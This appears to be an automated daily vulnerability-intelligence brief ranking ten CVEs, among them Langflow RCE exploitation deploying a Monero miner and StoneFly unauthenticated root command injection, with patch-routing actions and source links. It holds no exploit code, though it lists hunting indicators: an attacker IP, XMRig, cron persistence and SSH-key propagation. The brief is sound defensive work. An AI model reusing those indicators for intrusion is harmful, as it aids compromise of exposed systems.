ELEVATED 4 min read 1 Jul 2026

Langflow CVE-2026-33017 Leads Incident Response Queue as StoneFly and Citrix Drive Patch Routing

Today's intelligence is consolidated into 10 priority findings plus updates to ongoing stories. 19 further items tracked below.

Key findings
01
Langflow RCE exploitation deploys Monero miner on exposed AI endpoints
MEDIUM
[Medium] Classification: NEW. Langflow RCE exploitation deploys Monero miner on exposed AI endpoints is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.
02
Red Hat JBoss EAP / Undertow WID-SEC-2026-0054 advisory reaches CERT-Bund
HIGH
CVSS 7.5 high · CWE-20 Improper Input Validation · EPSS 65th percentile. Classification: NEW. Red Hat JBoss EAP / Undertow WID-SEC-2026-0054 advisory reaches CERT-Bund is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.
03
OFFIS DCMTK Toolkit path traversal affects healthcare imaging workflows
CRITICAL
CVSS 9.3 critical · CWE-22 Path Traversal. Classification: NEW. OFFIS DCMTK Toolkit path traversal affects healthcare imaging workflows is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.
04
Fission podSpec injection enables Kubernetes node escape and cluster takeover
CRITICAL
CVSS 9.9 critical · CWE-269 Improper Privilege Management · EPSS 22th percentile. Classification: NEW. Fission podSpec injection enables Kubernetes node escape and cluster takeover is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.
05
StoneFly Storage Concentrator exposes unauthenticated root command execution
CRITICAL
CVSS 10 critical · CWE-78 OS Command Injection. Classification: NEW. StoneFly Storage Concentrator exposes unauthenticated root command execution is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.
06
Progress Kemp LoadMaster CVE-2026-8037 patch-release item re-promoted by sidecar
CRITICAL
CVSS 9.6 critical · CWE-77 Command Injection · EPSS 77th percentile. Classification: UPDATED(patch_released). Today's delta is patch released. Treat this as a material update to an ongoing story, not as a new technical class.
07
CVE-2026-8631 HPLIP arbitrary-code-execution fixes land in Ubuntu
CRITICAL
CVSS 9.3 critical · CWE-122 Heap-based Buffer Overflow · EPSS 68th percentile. Classification: NEW. CVE-2026-8631 HPLIP arbitrary-code-execution fixes land in Ubuntu is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.
08
Angular CVE-2025-66412 high-severity XSS update reaches CERT-Bund
HIGH
CVSS 8.5 high · CWE-79 Cross-site Scripting · EPSS 30th percentile. Classification: NEW. Angular CVE-2025-66412 high-severity XSS update reaches CERT-Bund is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.
09
Frangoteam FUXA SCADA/HMI dot-segment bypass exposes users and roles
HIGH
CVSS 8.7 high · CWE-290 Authentication Bypass by Spoofing. Classification: NEW. Frangoteam FUXA SCADA/HMI dot-segment bypass exposes users and roles is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.
10
AdonisJS bodyparser CVE-2026-48795 incomplete fix
HIGH
CVSS 8.6 high · CWE-1321 Prototype Pollution. Classification: NEW. AdonisJS bodyparser CVE-2026-48795 incomplete fix is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Langflow RCE exploitation deploys Monero miner on exposed AI endpoints

Classification: NEW. Langflow RCE exploitation deploys Monero miner on exposed AI endpoints is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation. Current exploitation reporting comes from The Hacker News and Trend Micro.

Recommended action: Treat exposed Langflow as incident-response scope; hunt 83.142.209[.]214, lambsys, XMRig, cron persistence, and SSH-key propagation.

Identifiers: CVE-2026-33017

Sources: [The Hacker News report](https://thehackernews.com/2026/06/langflow-rce-exploited-to-deploy-monero.html)

Red Hat JBoss EAP / Undertow WID-SEC-2026-0054 advisory reaches CERT-Bund

Classification: NEW. Red Hat JBoss EAP / Undertow WID-SEC-2026-0054 advisory reaches CERT-Bund is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Recommended action: Route JBoss EAP and Undertow owners for fixed package validation.

Identifiers: WID-SEC-2026-0054 / CVE-2024-3884 / CVE-2025-12543 / CVE-2025-9784

Sources: [CERT-Bund WID-SEC-2026-0054](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-0054)

OFFIS DCMTK Toolkit path traversal affects healthcare imaging workflows

Classification: NEW. OFFIS DCMTK Toolkit path traversal affects healthcare imaging workflows is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Recommended action: Patch DCMTK and review C-GET storage mode in healthcare imaging workflows.

Identifiers: CVE-2026-50003

Sources: [CISA medical advisory](https://www.cisa.gov/news-events/ics-medical-advisories/icsma-26-181-01)

Fission podSpec injection enables Kubernetes node escape and cluster takeover

Classification: NEW. Fission podSpec injection enables Kubernetes node escape and cluster takeover is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Recommended action: Update Fission to v1.24.0 and validate admission controls for privileged podSpec fields.

Identifiers: CVE-2026-50545 / CVE-2026-50563

Sources: [Fission release notes](https://github.com/fission/fission/releases/tag/v1.24.0); [GitHub advisory GHSA-wmgg-3p4h-48x7](https://github.com/advisories/GHSA-wmgg-3p4h-48x7); [GitHub advisory GHSA-v455-mv2v-5g92](https://github.com/advisories/GHSA-v455-mv2v-5g92)

StoneFly Storage Concentrator exposes unauthenticated root command execution

Classification: NEW. StoneFly Storage Concentrator exposes unauthenticated root command execution is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Recommended action: Patch or isolate Storage Concentrator / SCVM versions below fixed 8.0.4.x builds.

Identifiers: CVE-2026-56415 / CVE-2026-56413 / CVE-2026-50110

Sources: [CISA ICS advisory](https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-06)

Progress Kemp LoadMaster CVE-2026-8037 patch-release item re-promoted by sidecar

Classification: UPDATED(patch_released). Today's delta is patch released. Treat this as a material update to an ongoing story, not as a new technical class.

Identifiers: CVE-2026-8037

Sources: [The Hacker News report](https://thehackernews.com/2026/06/progress-kemp-loadmaster-flaw-could-let.html)

CVE-2026-8631 HPLIP arbitrary-code-execution fixes land in Ubuntu

Classification: NEW. CVE-2026-8631 HPLIP arbitrary-code-execution fixes land in Ubuntu is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Recommended action: Update HPLIP packages where Linux endpoints or servers process untrusted print/document inputs.

Identifiers: CVE-2026-8631 / CVE-2026-8632 / USN-8483-1

Sources: [Ubuntu security notice](https://ubuntu.com/security/notices/USN-8483-1)

Angular CVE-2025-66412 high-severity XSS update reaches CERT-Bund

Classification: NEW. Angular CVE-2025-66412 high-severity XSS update reaches CERT-Bund is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Recommended action: Route Angular application owners to confirm deployed versions and fixed advisory mapping.

Identifiers: CVE-2025-66412 / WID-SEC-2025-2708 / GHSA-V4HV-RGFQ-GP49

Sources: [CERT-Bund WID-SEC-2025-2708](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-2708)

Frangoteam FUXA SCADA/HMI dot-segment bypass exposes users and roles

Classification: NEW. Frangoteam FUXA SCADA/HMI dot-segment bypass exposes users and roles is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Recommended action: Patch FUXA <=1.3.1 and restrict unauthenticated API paths.

Identifiers: CVE-2026-13207

Sources: [CISA ICS advisory](https://www.cisa.gov/news-events/ics-advisories/icsa-26-181-02)

AdonisJS bodyparser CVE-2026-48795 incomplete fix

Classification: NEW. AdonisJS bodyparser CVE-2026-48795 incomplete fix is newly promoted in today's intelligence. The supported response is owner routing, exposure review and fixed-version validation where the source names a patch or mitigation.

Recommended action: Upgrade @adonisjs/bodyparser to 10.1.5 or 11.0.3 where multipart uploads are accepted.

Identifiers: CVE-2026-48795 / GHSA-qcm7-3vpr-hj5h

Sources: [GitHub advisory GHSA-qcm7-3vpr-hj5h](https://github.com/advisories/GHSA-qcm7-3vpr-hj5h); [AdonisJS bodyparser release notes](https://github.com/adonisjs/bodyparser/releases/tag/v10.1.5); [AdonisJS bodyparser release notes](https://github.com/adonisjs/bodyparser/releases/tag/v11.0.3)

Also tracked

  • CVE-2026-49432 Apache ActiveMQ reaches BSI broker-owner routing · CVE-2026-49432 · High
  • CVE-2026-49451 Microsoft.OpenAPI parser termination patched · CVE-2026-49451 · High
  • Sigstore Fulcio OIDC redirect handling can leak Kubernetes service-account tokens · CVE-2026-49478 · High
  • NCSC-NL routes Citrix NetScaler ADC/Gateway · CVE-2026-8451 · High
  • GNU gzip CVE-2026-41991 and CVE-2026-41992 reach MSRC · CVE-2026-41991 · Medium
  • Apple WebKit/iOS/macOS/Safari CVE-2026-43707 patch batch · CVE-2026-43707 · Medium
  • Sigstore Timestamp Authority unauthenticated requests can exhaust memory · CVE-2026-49835 · Medium
  • CVE-2026-50229 Apache Tomcat reaches BSI and CERT-FR routing · CVE-2026-50229 · Medium
  • MSRC libxml2 CVE-2026-11979 stack-based buffer overflow · CVE-2026-11979 · Low
  • CVE-2026-52747 OWASP ModSecurity bypass reaches BSI high queue · CVE-2026-52747 · Unknown
  • WID-SEC-2026-2136 Icinga high-severity multi-vulnerability advisory
  • WID-SEC-2026-2132 NATS Server high-severity multi-vulnerability advisory
  • WID-SEC-2026-2133 OpenClaw high-severity multi-vulnerability advisory
  • Phantom squatting uses AI-hallucinated domains as a software supply-chain vector
  • Bash parser tricks expand AI coding-agent supply-chain concern
  • Nissan discloses employee data breach linked to Oracle zero-day attacks
  • PeopleSoft/ShinyHunters campaign adds Nissan and NAIC named victims
  • Polymarket frontend supply-chain incident reaches Check Point reporting
  • Weekly recap patch/remediation sidecar item remains low-actionability
citrixcve-2024-3884cve-2025-66412cve-2026-13207cve-2026-33017cve-2026-48795cve-2026-50003cve-2026-50545cve-2026-56415cve-2026-8037

Act on this brief

Map detection coverage gaps for the techniques above, or generate Sigma rules from the named CVEs.